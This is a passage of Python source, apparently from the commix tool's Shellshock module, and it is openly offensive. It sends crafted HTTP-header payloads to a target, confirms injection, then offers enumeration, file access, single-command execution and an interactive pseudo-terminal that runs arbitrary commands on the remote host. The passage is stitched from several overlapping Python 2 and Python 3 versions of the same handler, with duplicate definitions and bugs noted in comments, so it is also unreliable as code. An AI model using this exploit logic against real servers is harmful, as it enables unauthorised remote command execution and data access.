                err_msg = "'" + enumerate_again + "' is not a valid answer."
                print(settings.print_error_msg(err_msg))
                pass
          else:
            enumeration(url, cve, check_header, filename)
          # File access options.
          if settings.FILE_ACCESS_DONE == True :
            while True:
              if not menu.options.batch:
                question_msg = "Do you want to access files again? [Y/n] > "
                file_access_again = _input(settings.print_question_msg(question_msg))
              else:
                file_access_again= ""
              if len(file_access_again) == 0:
                file_access_again = "Y"
              if file_access_again in settings.CHOICE_YES:
                file_access(url, cve, check_header, filename)
                break
              elif file_access_again in settings.CHOICE_NO:
                break
              elif file_access_again in settings.CHOICE_QUIT:
                raise SystemExit()
              else:
                err_msg = "'" + file_access_again + "' is not a valid answer."
                print(settings.print_error_msg(err_msg))
                pass
          else:
            file_access(url, cve, check_header, filename)
          if menu.options.os_cmd:
            cmd = menu.options.os_cmd
            shell, payload = cmd_exec(url, cmd, cve, check_header, filename)
            # NOTE(review): print(...) returns None; "+ str" raises TypeError here.
            print("\n") + Fore.GREEN + Style.BRIGHT + shell + Style.RESET_ALL
            raise SystemExit()
          else:
            # Pseudo-Terminal shell
            print("")
            go_back = False
            go_back_again = False
            while True:
              if go_back == True:
                break
              if not menu.options.batch:
                question_msg = "Do you want a Pseudo-Terminal shell? [Y/n] > "
                gotshell = _input(settings.print_question_msg(question_msg))
              else:
                gotshell= ""
              if len(gotshell) == 0:
                gotshell= "Y"
              if gotshell in settings.CHOICE_YES:
                if not menu.options.batch:
                  print("")
                print("Pseudo-Terminal (type '" + Style.BRIGHT + "?" + Style.RESET_ALL + "' for available options)")
                if readline_error:
                  checks.no_readline_module()
                while True:
                  try:
                    if not readline_error:
                      # Tab compliter
                      readline.set_completer(menu.tab_completer)
                      # MacOSX tab compliter
                      if getattr(readline, '__doc__', '') is not None and 'libedit' in getattr(readline, '__doc__', ''):
                        readline.parse_and_bind("bind ^I rl_complete")
                      # Unix tab compliter
                      else:
                        readline.parse_and_bind("tab: complete")
                    cmd = _input("""commix(""" + Style.BRIGHT + Fore.RED + """os_shell""" + Style.RESET_ALL + """) > """)
                    cmd = checks.escaped_cmd(cmd)
                    # Built-in shell options are dispatched locally; anything
                    # else is sent to the target via cmd_exec.
                    if cmd.lower() in settings.SHELL_OPTIONS:
                      os_shell_option = checks.check_os_shell_options(cmd.lower(), technique, go_back, no_result)
                      go_back, go_back_again = check_options(url, cmd, cve, check_header, filename, os_shell_option, http_request_method, go_back, go_back_again)
                      if go_back:
                        break
                    else:
                      shell, payload = cmd_exec(url, cmd, cve, check_header, filename)
                      if shell != "":
                        # Update logs with executed cmds and execution results.
                        logs.executed_command(filename, cmd, shell)
                        print("\n" + Fore.GREEN + Style.BRIGHT + shell + Style.RESET_ALL + "\n")
                      else:
                        debug_msg = "Executing the '" + cmd + "' command. "
                        if settings.VERBOSITY_LEVEL == 1:
                          sys.stdout.write(settings.print_debug_msg(debug_msg))
                          sys.stdout.flush()
                          sys.stdout.write("\n" + settings.print_payload(payload)+ "\n")
                        elif settings.VERBOSITY_LEVEL >= 2:
                          sys.stdout.write(settings.print_debug_msg(debug_msg))
                          sys.stdout.flush()
                          sys.stdout.write("\n" + settings.print_payload(payload)+ "\n")
                        err_msg = "The '" + cmd + "' command, does not return any output."
                        print(settings.print_critical_msg(err_msg) + "\n")
                  except KeyboardInterrupt:
                    raise
                  except SystemExit:
                    raise
                  except EOFError:
                    err_msg = "Exiting, due to EOFError."
                    print(settings.print_error_msg(err_msg))
                    raise
                  except TypeError:
                    break
              elif gotshell in settings.CHOICE_NO:
                if checks.next_attack_vector(technique, go_back) == True:
                  break
                else:
                  if no_result == True:
                    return False
                  else:
                    return True
              elif gotshell in settings.CHOICE_QUIT:
                raise SystemExit()
              else:
                err_msg = "'" + gotshell + "' is not a valid answer."
                print(settings.print_error_msg(err_msg))
                continue
              break
        else:
          continue
    if no_result:
      if settings.VERBOSITY_LEVEL != 2:
        print("")
      err_msg = "All tested HTTP headers appear to be not injectable."
      print(settings.print_critical_msg(err_msg))
      raise SystemExit()
  except _urllib.error.HTTPError as err_msg:
    if str(err_msg.code) == settings.INTERNAL_SERVER_ERROR:
      response = False
    elif settings.IGNORE_ERR_MSG == False:
      err = str(err_msg) + "."
      # NOTE(review): same None + str TypeError as the --os-cmd path above.
      print("\n") + settings.print_critical_msg(err)
      continue_tests = checks.continue_tests(err_msg)
      if continue_tests == True:
        settings.IGNORE_ERR_MSG = True
      else:
        raise SystemExit()
  except _urllib.error.URLError as err_msg:
    # Drops the first two words of the reason text (e.g. "[Errno N]").
    err_msg = str(err_msg.reason).split(" ")[2:]
    err_msg = ' '.join(err_msg)+ "."
    if settings.VERBOSITY_LEVEL != 0 and settings.LOAD_SESSION == False:
      print("")
    print(settings.print_critical_msg(err_msg))
    raise SystemExit()
  except _http_client.IncompleteRead as err_msg:
    print(settings.print_critical_msg(err_msg + "."))
    raise SystemExit()
def shellshock_handler(url, http_request_method, filename):
  """Detect Shellshock via HTTP headers, then drive post-exploitation (py2 variant).

  For every ``(cve, header)`` pair a marker payload (``echo <cve>:Done;``) is
  sent directly with ``urllib2.urlopen`` (no proxy/Tor branch in this
  variant); the header is considered injectable when ``cve`` appears in the
  response headers or body.  On a hit the finding is logged, enumeration /
  file access are offered (or re-offered), ``--os-cmd`` is executed once, or
  an interactive pseudo-terminal loop is started.

  NOTE(review): the body check calls ``response.read()`` twice; the second
  call on a consumed urllib2 response returns an empty string, so the
  ``cve in response.read()`` test is always False -- confirm.

  :param url: target URL.
  :param http_request_method: recorded in the log via ``logs.add_parameter``.
  :param filename: log file path.
  :returns: ``False``/``True`` (no result / result) when the user declines the
    pseudo-terminal and no further attack vector follows; otherwise ``None``.
  :raises SystemExit: on quit choices, ``--os-cmd`` completion, any error
    inside the pseudo-terminal loop other than KeyboardInterrupt/SystemExit,
    or an HTTP error the user declines to ignore.
  """
  counter = 1
  vp_flag = True
  no_result = True
  export_injection_info = False
  injection_type = "results-based command injection"
  technique = "shellshock injection technique"
  info_msg = "Testing the " + technique + "... "
  sys.stdout.write(settings.print_info_msg(info_msg))
  sys.stdout.flush()
  try:
    i = 0
    total = len(shellshock_cves) * len(headers)
    for cve in shellshock_cves:
      for check_header in headers:
        # Check injection state
        settings.DETECTION_PHASE = True
        settings.EXPLOITATION_PHASE = False
        i = i + 1
        attack_vector = "echo " + cve + ":Done;"
        payload = shellshock_payloads(cve, attack_vector)
        # Check if defined "--verbose" option.
        if settings.VERBOSITY_LEVEL == 1:
          sys.stdout.write("\n" + settings.print_payload(payload))
        elif settings.VERBOSITY_LEVEL > 1:
          info_msg = "Generating a payload for injection..."
          print "\n" + settings.print_info_msg(info_msg)
          print settings.print_payload(payload)
        header = {check_header: payload}
        request = urllib2.Request(url, None, header)
        log_http_headers.check_http_traffic(request)
        # NOTE(review): no timeout is passed; a stalled target blocks here.
        response = urllib2.urlopen(request)
        # Progress: percent is overwritten with a status string on the last
        # attempt or on a hit; only shown when verbosity is 0.
        percent = ((i * 100) / total)
        float_percent = "{0:.1f}".format(round(((i * 100) / (total * 1.0)), 2))
        if str(float_percent) == "100.0":
          if no_result == True:
            percent = Fore.RED + "FAILED" + Style.RESET_ALL
          else:
            percent = Fore.GREEN + "SUCCEED" + Style.RESET_ALL
            no_result = False
        elif len(response.info()) > 0 and cve in response.info():
          percent = Fore.GREEN + "SUCCEED" + Style.RESET_ALL
          no_result = False
        elif len(response.read()) > 0 and cve in response.read():
          percent = Fore.GREEN + "SUCCEED" + Style.RESET_ALL
          no_result = False
        else:
          percent = str(float_percent) + "%"
        if not settings.VERBOSITY_LEVEL >= 1:
          info_msg = "Testing the " + technique + "... " + "[ " + percent + " ]"
          sys.stdout.write("\r" + settings.print_info_msg(info_msg))
          sys.stdout.flush()
        if no_result == False:
          # Check injection state
          settings.DETECTION_PHASE = False
          settings.EXPLOITATION_PHASE = True
          # Print the findings to log file.
          if export_injection_info == False:
            export_injection_info = logs.add_type_and_technique(export_injection_info, filename, injection_type, technique)
          #if vp_flag == True:
          vuln_parameter = "HTTP Header"
          the_type = " " + vuln_parameter
          # Leading space is added only for the log entry and stripped right after.
          check_header = " " + check_header
          vp_flag = logs.add_parameter(vp_flag, filename, the_type, check_header, http_request_method, vuln_parameter, payload)
          check_header = check_header[1:]
          logs.update_payload(filename, counter, payload)
          success_msg = "The (" + check_header + ") '"
          success_msg += url + Style.RESET_ALL + Style.BRIGHT
          success_msg += "' seems vulnerable via " + technique + "."
          print "\n" + settings.print_success_msg(success_msg)
          print settings.SUB_CONTENT_SIGN + "Payload: " + "\"" + payload + "\"" + Style.RESET_ALL
          if not settings.VERBOSITY_LEVEL >= 1:
            print ""
          # Enumeration options.
          if settings.ENUMERATION_DONE == True:
            if settings.VERBOSITY_LEVEL >= 1:
              print ""
            while True:
              if not menu.options.batch:
                question_msg = "Do you want to enumerate again? [Y/n] > "
                sys.stdout.write(settings.print_question_msg(question_msg))
                enumerate_again = sys.stdin.readline().replace("\n", "").lower()
              else:
                enumerate_again = ""
              if len(enumerate_again) == 0:
                enumerate_again = "y"
              if enumerate_again in settings.CHOICE_YES:
                enumeration(url, cve, check_header, filename)
                break
              elif enumerate_again in settings.CHOICE_NO:
                break
              elif enumerate_again in settings.CHOICE_QUIT:
                sys.exit(0)
              else:
                err_msg = "'" + enumerate_again + "' is not a valid answer."
                print settings.print_error_msg(err_msg)
                pass
          else:
            enumeration(url, cve, check_header, filename)
          # File access options.
          if settings.FILE_ACCESS_DONE == True:
            while True:
              if not menu.options.batch:
                question_msg = "Do you want to access files again? [Y/n] > "
                sys.stdout.write(settings.print_question_msg(question_msg))
                file_access_again = sys.stdin.readline().replace("\n", "").lower()
              else:
                file_access_again = ""
              if len(file_access_again) == 0:
                file_access_again = "y"
              if file_access_again in settings.CHOICE_YES:
                file_access(url, cve, check_header, filename)
                break
              elif file_access_again in settings.CHOICE_NO:
                break
              elif file_access_again in settings.CHOICE_QUIT:
                sys.exit(0)
              else:
                err_msg = "'" + file_access_again + "' is not a valid answer."
                print settings.print_error_msg(err_msg)
                pass
          else:
            file_access(url, cve, check_header, filename)
          if menu.options.os_cmd:
            cmd = menu.options.os_cmd
            shell, payload = cmd_exec(url, cmd, cve, check_header, filename)
            print "\n" + Fore.GREEN + Style.BRIGHT + shell + Style.RESET_ALL
            sys.exit(0)
          else:
            # Pseudo-Terminal shell
            go_back = False
            go_back_again = False
            while True:
              if go_back == True:
                break
              if settings.ENUMERATION_DONE == False and settings.FILE_ACCESS_DONE == False:
                if settings.VERBOSITY_LEVEL >= 1:
                  print ""
              if not menu.options.batch:
                question_msg = "Do you want a Pseudo-Terminal shell? [Y/n] > "
                sys.stdout.write(settings.print_question_msg(question_msg))
                gotshell = sys.stdin.readline().replace("\n", "").lower()
              else:
                gotshell = ""
              if len(gotshell) == 0:
                gotshell = "y"
              if gotshell in settings.CHOICE_YES:
                print ""
                print "Pseudo-Terminal (type '" + Style.BRIGHT + "?" + Style.RESET_ALL + "' for available options)"
                if readline_error:
                  checks.no_readline_module()
                while True:
                  try:
                    if not readline_error:
                      # Tab compliter
                      readline.set_completer(menu.tab_completer)
                      # MacOSX tab compliter
                      if getattr(readline, '__doc__', '') is not None and 'libedit' in getattr(readline, '__doc__', ''):
                        readline.parse_and_bind("bind ^I rl_complete")
                      # Unix tab compliter
                      else:
                        readline.parse_and_bind("tab: complete")
                    cmd = raw_input("""commix(""" + Style.BRIGHT + Fore.RED + """os_shell""" + Style.RESET_ALL + """) > """)
                    cmd = checks.escaped_cmd(cmd)
                    # Built-in shell options are dispatched locally; anything
                    # else is sent to the target via cmd_exec.
                    if cmd.lower() in settings.SHELL_OPTIONS:
                      os_shell_option = checks.check_os_shell_options(cmd.lower(), technique, go_back, no_result)
                      go_back, go_back_again = check_options(url, cmd, cve, check_header, filename, os_shell_option, http_request_method, go_back, go_back_again)
                      if go_back:
                        break
                    else:
                      shell, payload = cmd_exec(url, cmd, cve, check_header, filename)
                      if shell != "":
                        # Update logs with executed cmds and execution results.
                        logs.executed_command(filename, cmd, shell)
                        print "\n" + Fore.GREEN + Style.BRIGHT + shell + Style.RESET_ALL + "\n"
                      else:
                        info_msg = "Executing the '" + cmd + "' command... "
                        if settings.VERBOSITY_LEVEL == 1:
                          sys.stdout.write("\n" + settings.print_info_msg(info_msg))
                        elif settings.VERBOSITY_LEVEL > 1:
                          sys.stdout.write(settings.print_info_msg(info_msg))
                          sys.stdout.flush()
                          sys.stdout.write("\n" + settings.print_payload(payload) + "\n")
                        #print "\n" + settings.print_payload(payload)
                        err_msg = "The '" + cmd + "' command, does not return any output."
                        print settings.print_critical_msg(err_msg) + "\n"
                  except KeyboardInterrupt:
                    raise
                  except SystemExit:
                    raise
                  # NOTE(review): bare except -- any other error (including
                  # EOFError and bugs) ends the tool silently with exit code 0.
                  except:
                    print ""
                    sys.exit(0)
              elif gotshell in settings.CHOICE_NO:
                if checks.next_attack_vector(technique, go_back) == True:
                  break
                else:
                  if no_result == True:
                    return False
                  else:
                    return True
              elif gotshell in settings.CHOICE_QUIT:
                sys.exit(0)
              else:
                err_msg = "'" + gotshell + "' is not a valid answer."
                print settings.print_error_msg(err_msg)
                continue
              break
        else:
          continue
    if no_result:
      print ""
  except urllib2.HTTPError, err_msg:
    if str(err_msg.code) == settings.INTERNAL_SERVER_ERROR:
      response = False
    elif settings.IGNORE_ERR_MSG == False:
      err = str(err_msg) + "."
      print "\n" + settings.print_critical_msg(err)
      continue_tests = checks.continue_tests(err_msg)
      if continue_tests == True:
        settings.IGNORE_ERR_MSG = True
      else:
        raise SystemExit()
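def _print_error_separator():
  """Print the blank line(s) that move a critical message off the progress line.

  Which lines are emitted depends on the output-state flags: at verbosity 0
  one when settings.TIME_BASED_STATE is off, at verbosity >= 1 one when
  settings.EVAL_BASED_STATE is unset, plus one more at verbosity >= 1 when
  no session is being loaded. (Presumably those flags mean a same-line
  progress indicator is active -- TODO confirm.)
  """
  if (not settings.VERBOSITY_LEVEL >= 1 and settings.TIME_BASED_STATE == False) or \
     (settings.VERBOSITY_LEVEL >= 1 and settings.EVAL_BASED_STATE == None):
    print("")
  if settings.VERBOSITY_LEVEL >= 1 and settings.LOAD_SESSION == False:
    print("")


def _response_after_http_error(err_msg):
  """HTTPError handling shared by the --proxy and --tor transports.

  Always returns False (the caller's "no usable response" value). A 500 is
  silent, as is everything once settings.IGNORE_ERR_MSG is set; otherwise the
  error is printed and checks.continue_tests() decides between carrying on
  (which sets IGNORE_ERR_MSG) and raising SystemExit.
  """
  if str(err_msg.code) == settings.INTERNAL_SERVER_ERROR:
    return False
  if settings.IGNORE_ERR_MSG == False:
    _print_error_separator()
    print(settings.print_critical_msg(str(err_msg) + "."))
    if checks.continue_tests(err_msg) == True:
      settings.IGNORE_ERR_MSG = True
    else:
      raise SystemExit()
  return False


def _reason_message(reason):
  """Format a URLError reason for display, minus a leading '[Errno N] ' prefix.

  The previous code dropped the first two words unconditionally, so a reason
  such as "timed out" collapsed to just "."; text without a bracketed prefix
  is now kept whole.
  """
  text = str(reason)
  if text.startswith("[") and "] " in text:
    text = text.split("] ", 1)[1]
  return text + "."


def get_request_response(request):
  """Send *request* over the transport selected on the command line.

  Transport: proxy.use_proxy() with --proxy, tor.use_tor() with --tor,
  otherwise a direct urlopen(). headers.check_http_traffic() is called first
  unless settings.REVERSE_TCP or settings.BIND_TCP is set.

  Returns the response object, or False when the server answered with an
  HTTP error: a 500 is always silent, other statuses are reported unless
  settings.IGNORE_ERR_MSG is already set (on the direct transport a status
  equal to --ignore-code is not reported either), and the user is asked
  whether to continue. A URLError prints a critical message and raises
  SystemExit.
  """
  if settings.REVERSE_TCP == False and settings.BIND_TCP == False:
    headers.check_http_traffic(request)
  # Check if defined any HTTP Proxy.
  if menu.options.proxy:
    try:
      response = proxy.use_proxy(request)
    except _urllib.error.HTTPError as err_msg:
      response = _response_after_http_error(err_msg)
    except _urllib.error.URLError as err_msg:
      # `reason` is often an exception object rather than a str; testing
      # membership on it directly raises TypeError, so compare on its text.
      if "Connection refused" in str(err_msg.reason):
        err_msg = "The target host is not responding. "
        err_msg += "Please ensure that is up and try again."
      _print_error_separator()
      print(settings.print_critical_msg(str(err_msg)))
      raise SystemExit()
  # Check if defined Tor.
  elif menu.options.tor:
    try:
      response = tor.use_tor(request)
    except _urllib.error.HTTPError as err_msg:
      response = _response_after_http_error(err_msg)
    except _urllib.error.URLError as err_msg:
      if settings.VERBOSITY_LEVEL >= 1 and settings.LOAD_SESSION == False:
        print("")
      print(settings.print_critical_msg(_reason_message(err_msg.reason)))
      raise SystemExit()
  else:
    try:
      response = _urllib.request.urlopen(request)
    except _urllib.error.HTTPError as err_msg:
      if str(err_msg.code) != settings.INTERNAL_SERVER_ERROR and settings.IGNORE_ERR_MSG == False:
        # A status the user asked to ignore (--ignore-code) is not reported.
        if not str(err_msg.code) == str(menu.options.ignore_code):
          if settings.VERBOSITY_LEVEL < 2:
            print("\r" + settings.print_critical_msg(str(err_msg) + ".") + 30 * " ")
          if checks.continue_tests(err_msg) == True:
            settings.IGNORE_ERR_MSG = True
          else:
            raise SystemExit()
      # Every HTTP-error path yields False, so `response` is always bound
      # when we reach the return below.
      response = False
    except _urllib.error.URLError as err_msg:
      if settings.VERBOSITY_LEVEL >= 1 and settings.LOAD_SESSION == False:
        print("")
      print(settings.print_critical_msg(_reason_message(err_msg.reason)))
      raise SystemExit()
    else:
      # NOTE(review): on success the urlopen() response is replaced by
      # whatever headers.check_http_traffic() returns -- confirm this is
      # intended, since it looks like it may issue the request a second time.
      response = headers.check_http_traffic(request)
  return response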
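def _confirm(question_msg):
  """Ask a [Y/n] question on stdin and return True for yes, False for no.

  In --batch mode the default (yes) is taken without prompting. An empty
  answer also means yes, an answer in settings.CHOICE_QUIT raises SystemExit,
  and anything else prints an error and re-asks.
  """
  while True:
    if not menu.options.batch:
      sys.stdout.write(settings.print_question_msg(question_msg))
      answer = sys.stdin.readline().replace("\n", "").lower()
    else:
      answer = ""
    if len(answer) == 0:
      answer = "y"
    if answer in settings.CHOICE_YES:
      return True
    if answer in settings.CHOICE_NO:
      return False
    if answer in settings.CHOICE_QUIT:
      raise SystemExit()
    err_msg = "'" + answer + "' is not a valid answer."
    print settings.print_error_msg(err_msg)


def shellshock_handler(url, http_request_method, filename):
  """Detect and exploit Shellshock through HTTP request headers.

  For every CVE in ``shellshock_cves`` and every header name in ``headers``,
  the header is set to the payload built by shellshock_payloads() for
  ``echo <cve>:Done;`` and the request is sent over the configured transport
  (--proxy, --tor or a direct urlopen()). The target is flagged when the CVE
  string appears as a response header name or inside the response body.

  On a hit the finding is written to the log file, enumeration and file
  access run (or are re-run on request), and then either the single --os-cmd
  command is executed (the run exits afterwards) or an interactive
  pseudo-terminal is offered.

  Args:
    url: target URL.
    http_request_method: HTTP method name, only recorded in the log.
    filename: log file that receives the findings and executed commands.

  Returns:
    False/True (whether the target was found vulnerable) when the user
    declines the pseudo-terminal and there is no next attack vector;
    otherwise None once all header/CVE pairs were tried. Exits via
    SystemExit on --os-cmd, on a quit answer and on unrecoverable HTTP
    errors.
  """
  counter = 1
  vp_flag = True
  no_result = True
  export_injection_info = False

  injection_type = "results-based command injection"
  technique = "shellshock injection technique"

  info_msg = "Testing the " + technique + "... "
  if settings.VERBOSITY_LEVEL > 1:
    info_msg = info_msg + "\n"
  sys.stdout.write(settings.print_info_msg(info_msg))
  sys.stdout.flush()

  try:
    i = 0
    total = len(shellshock_cves) * len(headers)
    for cve in shellshock_cves:
      for check_header in headers:
        # Check injection state
        settings.DETECTION_PHASE = True
        settings.EXPLOITATION_PHASE = False
        i = i + 1
        attack_vector = "echo " + cve + ":Done;"
        payload = shellshock_payloads(cve, attack_vector)

        # Check if defined "--verbose" option.
        if settings.VERBOSITY_LEVEL == 1:
          sys.stdout.write("\n" + settings.print_payload(payload))
        elif settings.VERBOSITY_LEVEL > 1:
          info_msg = "Generating a payload for injection..."
          print settings.print_info_msg(info_msg)
          print settings.print_payload(payload)

        header = {check_header : payload}
        request = urllib2.Request(url, None, header)
        # Keep the recorded User-Agent in step with what is actually sent.
        if check_header == "User-Agent":
          menu.options.agent = payload
        else:
          menu.options.agent = default_user_agent
        log_http_headers.do_check(request)
        log_http_headers.check_http_traffic(request)
        # Check if defined any HTTP Proxy.
        if menu.options.proxy:
          response = proxy.use_proxy(request)
        # Check if defined Tor.
        elif menu.options.tor:
          response = tor.use_tor(request)
        else:
          response = urllib2.urlopen(request)

        float_percent = "{0:.1f}".format(round(((i*100)/(total*1.0)),2))

        # Look for the echoed CVE marker, first among the response header
        # names and then in the body. The body is read exactly once: a
        # second read() returns an empty string, which made the previous
        # `len(response.read()) > 0 and cve in response.read()` dead code.
        response_headers = response.info()
        detected = len(response_headers) > 0 and cve in response_headers
        if not detected:
          response_body = response.read()
          detected = len(response_body) > 0 and cve in response_body

        if detected:
          percent = Fore.GREEN + "SUCCEED" + Style.RESET_ALL
          no_result = False
        elif str(float_percent) == "100.0":
          # Last attempt: report the overall outcome. This is checked after
          # the detection above so the final header/CVE pair is examined too
          # (previously its response was never looked at).
          if no_result == True:
            percent = Fore.RED + "FAILED" + Style.RESET_ALL
          else:
            percent = Fore.GREEN + "SUCCEED" + Style.RESET_ALL
        else:
          percent = str(float_percent) + "%"
        if not settings.VERBOSITY_LEVEL >= 1:
          info_msg = "Testing the " + technique + "... " + "[ " + percent + " ]"
          sys.stdout.write("\r" + settings.print_info_msg(info_msg))
          sys.stdout.flush()

        if no_result == False:
          # Check injection state
          settings.DETECTION_PHASE = False
          settings.EXPLOITATION_PHASE = True
          # Print the findings to log file.
          if export_injection_info == False:
            export_injection_info = logs.add_type_and_technique(export_injection_info, filename, injection_type, technique)
          vuln_parameter = "HTTP Header"
          the_type = " " + vuln_parameter
          # The log helper expects the leading space; strip it again afterwards.
          check_header = " " + check_header
          vp_flag = logs.add_parameter(vp_flag, filename, the_type, check_header, http_request_method, vuln_parameter, payload)
          check_header = check_header[1:]
          logs.update_payload(filename, counter, payload)

          if settings.VERBOSITY_LEVEL >= 1:
            checks.total_of_requests()

          success_msg = "The (" + check_header + ") '"
          success_msg += url + Style.RESET_ALL + Style.BRIGHT
          success_msg += "' seems vulnerable via " + technique + "."
          if settings.VERBOSITY_LEVEL <= 1:
            print ""
          print settings.print_success_msg(success_msg)
          print settings.SUB_CONTENT_SIGN + "Payload: " + "\"" + payload + "\"" + Style.RESET_ALL

          # Enumeration options.
          if settings.ENUMERATION_DONE == True:
            if settings.VERBOSITY_LEVEL >= 1:
              print ""
            if _confirm("Do you want to enumerate again? [Y/n] > "):
              enumeration(url, cve, check_header, filename)
          else:
            enumeration(url, cve, check_header, filename)

          # File access options.
          if settings.FILE_ACCESS_DONE == True:
            if _confirm("Do you want to access files again? [Y/n] > "):
              file_access(url, cve, check_header, filename)
          else:
            file_access(url, cve, check_header, filename)

          if menu.options.os_cmd:
            cmd = menu.options.os_cmd
            shell, payload = cmd_exec(url, cmd, cve, check_header, filename)
            print "\n" + Fore.GREEN + Style.BRIGHT + shell + Style.RESET_ALL
            raise SystemExit()

          # Pseudo-Terminal shell
          print ""
          go_back = False
          go_back_again = False
          if _confirm("Do you want a Pseudo-Terminal shell? [Y/n] > "):
            if not menu.options.batch:
              print ""
            print "Pseudo-Terminal (type '" + Style.BRIGHT + "?" + Style.RESET_ALL + "' for available options)"
            if readline_error:
              checks.no_readline_module()
            while True:
              try:
                if not readline_error:
                  readline.set_completer(menu.tab_completer)
                  # libedit-based readline (macOS) needs a different binding.
                  if getattr(readline, '__doc__', '') is not None and 'libedit' in getattr(readline, '__doc__', ''):
                    readline.parse_and_bind("bind ^I rl_complete")
                  else:
                    readline.parse_and_bind("tab: complete")
                cmd = raw_input("commix(" + Style.BRIGHT + Fore.RED + "os_shell" + Style.RESET_ALL + ") > ")
                cmd = checks.escaped_cmd(cmd)
                if cmd.lower() in settings.SHELL_OPTIONS:
                  os_shell_option = checks.check_os_shell_options(cmd.lower(), technique, go_back, no_result)
                  go_back, go_back_again = check_options(url, cmd, cve, check_header, filename, os_shell_option, http_request_method, go_back, go_back_again)
                  if go_back:
                    break
                else:
                  shell, payload = cmd_exec(url, cmd, cve, check_header, filename)
                  if shell != "":
                    # Update logs with executed cmds and execution results.
                    logs.executed_command(filename, cmd, shell)
                    print "\n" + Fore.GREEN + Style.BRIGHT + shell + Style.RESET_ALL + "\n"
                  else:
                    info_msg = "Executing the '" + cmd + "' command... "
                    if settings.VERBOSITY_LEVEL >= 1:
                      sys.stdout.write(settings.print_info_msg(info_msg))
                      sys.stdout.flush()
                      sys.stdout.write("\n" + settings.print_payload(payload) + "\n")
                    err_msg = "The '" + cmd + "' command, does not return any output."
                    print settings.print_critical_msg(err_msg) + "\n"
              except KeyboardInterrupt:
                raise
              except SystemExit:
                raise
              except EOFError:
                err_msg = "Exiting, due to EOFError."
                print settings.print_error_msg(err_msg)
                raise
              except:
                # Any other error ends the shell session and resumes detection.
                # NOTE(review): this bare except hides the real exception;
                # consider at least printing it at high verbosity.
                info_msg = "Testing the " + technique + "... "
                if settings.VERBOSITY_LEVEL > 1:
                  info_msg = info_msg + "\n"
                sys.stdout.write(settings.print_info_msg(info_msg))
                sys.stdout.flush()
                break
          else:
            if checks.next_attack_vector(technique, go_back) == True:
              pass
            elif no_result == True:
              return False
            else:
              return True

    if no_result and settings.VERBOSITY_LEVEL < 2:
      print ""

  except urllib2.HTTPError as err_msg:
    if str(err_msg.code) == settings.INTERNAL_SERVER_ERROR:
      response = False
    elif settings.IGNORE_ERR_MSG == False:
      err = str(err_msg) + "."
      print "\n" + settings.print_critical_msg(err)
      continue_tests = checks.continue_tests(err_msg)
      if continue_tests == True:
        settings.IGNORE_ERR_MSG = True
      else:
        raise SystemExit()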
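def _exit_on_unauthorized(err_msg):
  """Handle an HTTP 401 ('Unauthorized') answer.

  With --ignore-401 the error is deliberately ignored and None is returned,
  so the caller gets no response object. Otherwise a critical message is
  printed -- naming the --auth-type/--auth-cred pair when one was given --
  and the run is aborted with SystemExit.
  """
  if menu.options.ignore_401:
    return None
  if menu.options.auth_type and menu.options.auth_cred:
    err_msg = "The provided pair of " + menu.options.auth_type
    err_msg += " HTTP authentication credentials '" + menu.options.auth_cred + "'"
    err_msg += " seems to be invalid."
    print settings.print_critical_msg(err_msg)
    raise SystemExit()
  try:
    # "[Errno N] text" -> "text."; anything else falls back to the full text.
    error_msg = str(err_msg.args[0]).split("] ")[1] + "."
  except IndexError:
    error_msg = str(err_msg).replace(": ", " (") + ")."
  print settings.print_critical_msg(error_msg)
  raise SystemExit()


def examine_request(request):
  """Send *request* and return the response, reporting transport failures.

  The transport follows the CLI options (--proxy, --tor, else a direct
  urlopen()). Returns the response object; returns False for an HTTP error
  on a --bulkfile run (the URL is skipped with a warning) and None when a
  401 is ignored via --ignore-401 or when an unexpected exception is
  reported. Every other failure prints a critical message and raises
  SystemExit.
  """
  try:
    headers.check_http_traffic(request)
    # Check if defined any HTTP Proxy (--proxy option).
    if menu.options.proxy:
      return proxy.use_proxy(request)
    # Check if defined Tor (--tor option).
    elif menu.options.tor:
      return tor.use_tor(request)
    else:
      try:
        return urllib2.urlopen(request)
      except SocketError as e:
        # WSAECONNRESET exists only in the Windows errno table; reading it
        # directly raised AttributeError on every other platform.
        wsa_reset = getattr(errno, "WSAECONNRESET", None)
        if e.errno == errno.ECONNRESET:
          error_msg = "Connection reset by peer."
          print settings.print_critical_msg(error_msg)
        elif wsa_reset is not None and e.errno == wsa_reset:
          error_msg = "An existing connection was forcibly closed by the remote host."
          print settings.print_critical_msg(error_msg)
        raise SystemExit()

  except ValueError:
    # Invalid format for the '--header' option.
    if settings.VERBOSITY_LEVEL < 2:
      print "[ " + Fore.RED + "FAILED" + Style.RESET_ALL + " ]"
    err_msg = "Use '--header=\"HEADER_NAME: HEADER_VALUE\"'"
    err_msg += "to provide an extra HTTP header or"
    err_msg += " '--header=\"HEADER_NAME: " + settings.WILDCARD_CHAR + "\"' "
    err_msg += "if you want to try to exploit the provided HTTP header."
    print settings.print_critical_msg(err_msg)
    raise SystemExit()

  # HTTPError is an Exception subclass: it must be caught before the generic
  # handler below, otherwise this clause (and the --bulkfile skip) is dead.
  except urllib2.HTTPError as err_msg:
    if "Unauthorized" in str(err_msg):
      return _exit_on_unauthorized(err_msg)
    text = str(err_msg)
    error_description = ""
    if len(text.split(": ", 1)[-1]) == 0:
      error_description = "Non-standard HTTP status code"
    message = text.replace(": ", " (") + error_description + ")."
    if menu.options.bulkfile:
      # This function has no `url` parameter; take it from the request.
      warn_msg = "Skipping URL '" + request.get_full_url() + "' - " + message
      print settings.print_warning_msg(warn_msg)
      if settings.EOF:
        print ""
      return False
    print settings.print_critical_msg(message)
    raise SystemExit()

  except Exception as err_msg:
    if "Unauthorized" in str(err_msg):
      return _exit_on_unauthorized(err_msg)
    # Previously swallowed silently, leaving the caller with None and no
    # explanation. Still best-effort (None is returned), but say why.
    print settings.print_critical_msg(str(err_msg) + ".")
    return None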
